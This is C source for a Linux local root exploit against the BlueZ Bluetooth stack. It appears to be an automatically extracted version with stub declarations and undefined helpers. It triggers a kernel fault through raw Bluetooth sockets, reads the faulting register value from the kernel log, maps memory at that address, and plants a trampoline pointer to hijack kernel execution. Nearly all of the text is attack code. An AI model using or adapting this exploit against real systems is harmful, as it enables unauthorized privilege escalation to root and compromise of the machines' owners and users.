
typedef unsigned long size_t;
typedef long intptr_t; typedef unsigned long uintptr_t;
typedef long scalar_t__;

typedef int bool;






struct utsname {char* release; } ;


 int AF_BLUETOOTH ;
 int MAP_ANONYMOUS ;
 int MAP_FIXED ;
 int MAP_SHARED ;
 int PROT_READ ;
 int PROT_WRITE ;
 int SOCK_RAW ;
 int brk (void*) ;
 int exit (int) ;
 scalar_t__ fork () ;
 int getgid () ;
 int getuid () ;
 int gid ;
 int klogctl (int,char*,int) ;
 int load_highlevel ;
 int* mmap (void*,int,int,int,int ,int ) ;
 int printf (char*,...) ;
 int socket (int ,int ,unsigned int) ;
 char* strstr (char*,char*) ;
 unsigned int strtoul (char*,int ,int ) ;
 int uid ;
 scalar_t__ uname (struct utsname*) ;
 int usage (char*) ;
 int usleep (int) ;

main(int argc, char *argv[])
{
char buf[2048];
int sock, *mod = (int*)buf;
int *linker = 0;

unsigned int arg;
int tmp;
char *check;
struct utsname vers;

gid = getgid();
uid = getuid();

printf("-|-bluez local root exploit v.0.9  -by qobaiashi-\n |\n");
if (uname(&vers) < 0)
   printf(" |- couldn't determine kernel version\n");

else
    printf(" |- i've found kernel %s\n", vers.release);


printf(" |- trampoline is at %p\n", &load_highlevel);


if (argc < 2)
   {
    usage(argv[0]);
    exit(1);
    }

if (argc == 2)
    arg = strtoul(argv[1], 0, 0);


if (fork() != 0)
   {

   usleep(1000);
   if ((tmp = klogctl(0x3, buf, 1700)) > -1)
       {
        check = strstr(buf, "ecx: ");
        printf(" |- [%0.14s]\n", check);
        check+=5;
        *(check+9) = 0x00;*(--check) = 'x';*(--check) = '0';
        mod = (unsigned int*)strtoul(check, 0, 0);

        int *ecx = mod;
        mod = (int)mod &~ 0x00000fff;
        linker =
mmap((void*)mod,0x2000,PROT_WRITE|PROT_READ,MAP_SHARED|MAP_ANONYMOUS|MAP_FIXED,0,0);
        if(linker == mod)
          {
           printf(" |- suitable value found!using %p\n", mod);
           printf(" |- the time has come to push the button... \n");
           for (sock = 0;sock <= 1;sock++)
                *(ecx++) = (int)&load_highlevel;
           }

           else
             {
              printf(" |- could not mmap   %p\n", mod);
              if( brk((void*)mod+0x200 ) == -1)
                {
                 printf(" |- could not brk to %p\n", mod);
                 printf(" `-------------------------------\n");
                 exit(-1);
                 }

              printf(" |- suitable value found!using %p\n", mod);
              printf(" |- the time has come to push the button... \n");
              for (sock = 0;sock <= 1;sock++)
                  *(ecx++) = (int)&load_highlevel;

              }
           if ((sock = socket(AF_BLUETOOTH, SOCK_RAW, arg)) < 0)
               exit(1);

        }
   return 0;
   }

if (fork() == 0)
{
  printf(" |- trying...\n");
  if ((sock = socket(AF_BLUETOOTH, SOCK_RAW, arg)) < 0)
      {
      printf(" |- something went w0rng (invalid value)\n");
      exit(1);
     }
}

exit(0);
}
